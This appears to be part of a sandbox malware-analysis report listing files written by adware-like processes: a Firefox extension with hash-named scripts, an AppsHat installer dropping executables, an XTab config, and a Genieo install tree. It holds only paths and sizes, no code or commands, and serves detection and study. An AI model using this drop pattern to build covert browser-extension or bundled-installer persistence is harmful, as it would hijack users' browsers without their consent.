C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\220.js (1592 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\13.js (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\b2e7327e3ac0e48bdfe0f2ee52c9bfcf.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\223.js (829 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\c61ce4124d823fd35688eed80827a81c.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\104.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\177.js (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\872632d4dba5c171e72a42614d2bf42b.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\6f853c3a67c26281e0f08b3f48ebe9f2.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\7b5b2cd1ed885911b763748de0e62fac.js (134 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\b9f5ee3c3d06e3f31441702c458c077e.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\5f811dd3d0ee0431837525a50e825c15.js (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\14.js (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins.json (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\f4df6139b485e8441ead85439d9b0e50.js (964 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\16.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\adef4cf34f09c97ddf05ee0f7b152b30.js (947 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\defaults\preferences\prefs.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\9774056cfe57a06b996430a878d9f2bd.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\200.js (813 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\f183a1c9337b10ab3663860e202a82b3.js (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\207.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\97f2d9400f4f41e0a004435861570a3b.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\102.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\0cb63f7cf6b8159c4f9788d9ed18275e.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\2b28a69712a27f77ea83be613b1b130b.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\246.js (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\242.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\651148047984925c52db469330db90bf.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\91.js (6772 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\popup.html (353 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\icon16.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\96535ae26022e95205336b6fd0dfa30b.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\40fbad884e8b31bac377f4b3b4234a30.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\6acae8acaae3dc3de618c70dcea92ac0.js (618 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\252.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\64.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\4.js (3410 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\manifest.xml (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\78.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\47.js (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\c262c0e9c94427dc9ed88ee28c1a65df.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\options.xul (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\28.js (540 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\update.css (144 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\locale\en-US\translations.dtd (429 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\589ae49080bbcf5ef005df42c5431597.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\c11ef8a5aa8ffdad3fc716ad6936ea56.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\98.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\search_dialog.xul (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome.manifest (634 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\7.js (689 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\background.html (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\ebfd80fa6c60ea67c1d52c5d9ab644bf.js (357 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\c0199a124990378c5a0d61a8fe029843.js (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\userCode\background.js (640 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\4d651c7925db39b85b6a733479754503.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\dialog.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\03afa64119f70e1aebbe898c1b5da437.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\icon128.png (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\installer.js (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\icon48.png (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\bf8b21d3242abeb0ac0b4bad994e9dad.js (651 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\17.js (2473 bytes)

The process powershell.exe:976 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P5Y5B9WWJJJ5HVQUNP5Q.temp (196 bytes)

The process powershell.exe:1020 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KAWX3NZ41ZYMD0YSFS9E.temp (196 bytes)

The process powershell.exe:3596 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\49RJHLBJDH30A4KJTGPP.temp (196 bytes)

The process appshat_generic.exe:108 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nspF4EB.tmp\inetc.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaF4DB.tmp (10027 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\AppsHat Mobile Apps\Uninstall.exe (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe (11608 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nspF4EB.tmp\appshat.exe (13188 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nspF4EB.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nspF4EB.tmp\webplayer_installer.exe (8184 bytes)

The process HPNotify.exe:3132 makes changes in the file system.
The Application creates and/or writes to the following file(s):

%Program Files% (x86)\XTab\conf (1498 bytes)

The process gentray.exe:3260 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\log\gentray.log (7783 bytes)

The process gentray.exe:3080 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\log\gentray.log (14587 bytes)

The process genieo_setup.gen:3380 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\cmd_close.gif (840 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\js\partnerConfig.js (937 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\2_collecting.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\1_downloading.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\js\partnerConfig.js (937 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_prev.png (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\icon-16-disabled.png (646 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-enable.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002_old\text (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\down1.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\collapse.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_next.png (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\gim394750002\genuninstallui.exe (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\genuninstallui.exe (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\text\LicenseAgreement.txt (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\down1.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\tray_awaitingMessage.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\conf\partner.properties (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\firefox-bar-24.png (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\install_icon.ico (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\down2.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\complete.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\notification_rgn_image.bmp (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\prep_env_err.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsvDA79.tmp\fct.dll (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-2.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\text.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsvDA79.tmp\KillProcDLL.dll (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\GenericApp.icns (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\icon-16-enabled.png (537 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo_old\img\tray (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\prep_env.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\down3.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\desktop.ico (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\enabled_nav_next.gif (847 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\css\partner.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\tray_normal.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-disabled_18px.png (914 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\cmd_close.png (155 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\genieo-16icon-browser-disabled.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\2_collecting.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\redHome.png (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\gim394750002\partner_uninstall.exe (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\icon-16-disabled.png (646 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_next.gif (847 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\down3.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\text\en_text.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002_old (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_prev.png (153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_next.png (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\bin\license.exe (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\network_retry.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\hide_notfication_seperator.png (281 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\expand.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\css\partner.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\LicenseAgreement.txt (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\uac_retry.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_next.gif (847 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002_old\img\tray (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\firefox-bar-16.png (586 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\enabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-enabled_18px.png (821 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\down2.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-disabled_18px.png (914 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\3_mapping.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\favicon.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-enable.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_prev.png (153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\GenericApp.icns (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_next.gif (855 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\install_icon.ico (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\favicon.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\complete.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-2.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disabled_nav_next.gif (855 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\conf\partnerBannedList.dat (66 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\conf\partnerBannedList.dat (66 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_next.png (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\off.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002_old\img (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\genieo-16icon-browser-disabled.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\error.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_next.png (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\conf\partner.properties (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\tray_normal.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-1.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\fr_text.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_rgn_image.bmp (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\firefox-bar-16.png (586 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\css\notify_partner.css (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sethpButton.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\prep_env.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\uac_retry.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\ru_complete.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\error.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\prep_env_err.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\text\text.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\ru_text.properties (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\dfImg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\1_downloading.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-3.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\network_retry.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\en_text.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\desktop.ico (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-3.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo_old\text (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\fr_complete.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\icon-16-enabled.png (537 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\partner_uninstall.exe (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-disable.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsvDA78.tmp (25714 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-disable.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\firefox-bar-24.png (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\hide_notification.png (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-4.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-4.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\3_mapping.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\4_creating.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\4_creating.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_prev.png (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_next.gif (855 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\footer_right_logo.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\genieo-16icon-browser.png (537 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-enabled_18px.png (821 bytes)
